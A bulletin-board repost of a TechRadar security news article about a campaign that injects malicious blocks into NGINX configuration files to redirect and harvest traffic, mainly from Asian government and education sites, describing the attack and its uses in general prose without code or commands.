NGINX servers hijacked in global campaign to redirect traffic

BBS:      TELESC.NET.BR
Assunto:  NGINX servers hijacked in global campaign to redirect traffic
De:       Mike Powell
Data:     Fri, 6 Feb 2026 11:50:54 -0500
-----------------------------------------------------------
NGINX servers hijacked in global campaign to redirect traffic

By Sead Fadilpa?i? published yesterday

Redirected traffic can be abused in multiple ways, experts warn

Cybercriminals are targeting NGINX servers, rerouting legitimate traffic
through their malicious infrastructure, experts have warned.

Security researchers at DataDog Security Labs found the attackers are focused
primarily on Asian targets in the government and education industries.

NGINX servers are software systems that sit in front of websites or apps and
handle incoming web traffic. They serve content, balance loads, and route
requests to the appropriate backend servers.

What to do with the stolen data

In the attack, the unnamed threat actors modify the NGINX configuration files
and inject malicious blocks that grab incoming requests. They then rewrite them
to include the original URL and forward traffic to domains under their control.
As per DataDog, this is a five-stage attack that starts with a configuration
injection and ends with data exfiltration.

Since no vulnerability is being abused here, and the victims still end up on
the pages they asked for, none is the wiser. Still, cybercriminals are getting
away with valuable information that can be used in different ways.  Because
headers are preserved, the attacker can collect IP addresses, user agents,
referrers, session tokens, cookies, and sometimes credentials or API keys if
they appear in requests. On government or .edu sites, that data is especially
valuable.

They can also manipulate content, selectively. Since only certain URL paths are
hijacked, the attacker can inject ads, phishing pages, malware downloads, or
fake login prompts only when they want, successfully targeting specific users,
regions, or time zones.

Then, there is the option of traffic monetization and resale. Clean, real user
traffic routed through attacker infrastructure can be sold for ad fraud, SEO
manipulation, click-fraud, or used to boost other malicious services, which is
a common practice in large-scale proxy ecosystems.

Finally, compromised NGINX servers can be used to proxy attacks against other
targets, effectively masking their origins.

Via BleepingComputer


https://www.techradar.com/pro/security/nginx-servers-hijacked-in-global-campaig
n-to-redirect-traffic

$$
--- SBBSecho 3.28-Linux
 * Origin: Capitol City Online (1:2320/105)

-----------------------------------------------------------
[Voltar]